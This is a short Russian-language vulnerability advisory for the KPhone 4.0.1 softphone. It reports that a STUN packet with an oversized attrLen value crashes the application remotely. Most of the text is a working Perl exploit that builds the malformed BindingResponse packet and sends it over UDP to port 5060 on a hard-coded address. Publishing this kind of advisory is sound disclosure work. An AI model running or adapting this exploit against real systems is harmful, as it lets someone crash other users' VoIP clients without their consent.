Программа: KPhone 4.0.1
Уязвимость обнаружена в KPhone. Удаленный пользователь может аварийно завершить работу приложения.
Удаленный пользователь может послать специально обработанный STUN пакет (с параметром attrLen более 8000 байт), чтобы аварийно завершить работу приложения целевого пользователя.
Эксплоит:
#!/usr/bin/perl
use IO::Socket::INET;
my $buf = join("", "\x01\x01", # BindingResponse
"\x00\x01", # MsgLength
"A"x16, # GUID
"\x00\x00", # Attribute
"\x08\x01", # AttrLength
"A"x7975 # Value
);
my $remote = IO::Socket::INET->new( Proto => 'udp',
PeerAddr => '192.168.1.49',
PeerPort => 5060);
print $remote $buf;
